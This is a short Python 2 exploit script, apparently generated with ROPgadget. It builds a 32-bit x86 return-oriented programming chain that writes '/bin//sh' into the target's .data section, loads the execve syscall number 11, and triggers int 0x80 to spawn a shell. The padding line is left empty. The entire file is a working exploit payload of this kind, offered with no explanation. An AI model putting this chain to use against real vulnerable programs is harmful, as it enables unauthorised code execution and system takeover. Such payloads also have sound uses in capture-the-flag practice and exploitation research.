#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = ''

p += pack('<I', 0x0805dcaa) # pop edx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080c2546) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08099e9d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0805dcaa) # pop edx ; ret
p += pack('<I', 0x080ef064) # @ .data + 4
p += pack('<I', 0x080c2546) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08099e9d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0805dcaa) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x0804e7b0) # xor eax, eax ; ret
p += pack('<I', 0x08099e9d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ec) # pop ebx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080e6a2e) # pop ecx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x0805dcaa) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x0804e7b0) # xor eax, eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x0809bc96) # inc eax ; ret
p += pack('<I', 0x080495a9) # int 0x80

print p
